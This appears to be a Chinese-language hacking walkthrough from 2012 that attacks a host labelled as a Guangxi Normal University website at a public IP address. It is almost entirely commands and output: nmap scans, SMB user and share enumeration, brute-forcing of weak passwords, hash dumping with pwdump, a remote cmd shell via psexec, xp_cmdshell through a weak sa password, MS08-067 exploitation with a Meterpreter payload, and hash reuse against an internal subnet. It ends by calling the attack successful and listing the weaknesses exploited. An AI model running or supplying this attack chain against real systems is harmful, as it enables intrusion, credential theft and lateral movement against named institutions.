广西师范网站 http://202.103.242.241/
root@bt:~# nmap -sS -sV 202.103.242.241
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
135/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open mstask Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open msrpc Microsoft Windows RPC
3372/tcp open msdtc?
3389/tcp open ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root 1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
| ADMIN$
| Anonymous access: <none>
| C$
| Anonymous access: <none>
| IPC$
|_ Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
| administrator:<blank> => Login was successful
|_ test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2 //抓hash
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe //获取一个cmdshell
PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.17 B/ W9 q1 r9 t9 f" ~' r
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' " //远程登录sa执行命令

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_ MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录
Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
3372/tcp open msdtc
3389/tcp open ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_ administrator:<blank> => Login was successful

攻击成功,一个简单的msf+nmap攻击~~ 整条链之所以能走通，靠的是上面每一步暴露出来的配置问题：Administrator 空口令、test 账户弱口令、sa 弱口令且 xp_cmdshell 可用、IPC$ 匿名可读、账户仍保留可直接复用的 LM/NT hash，以及未修补的 MS08-067。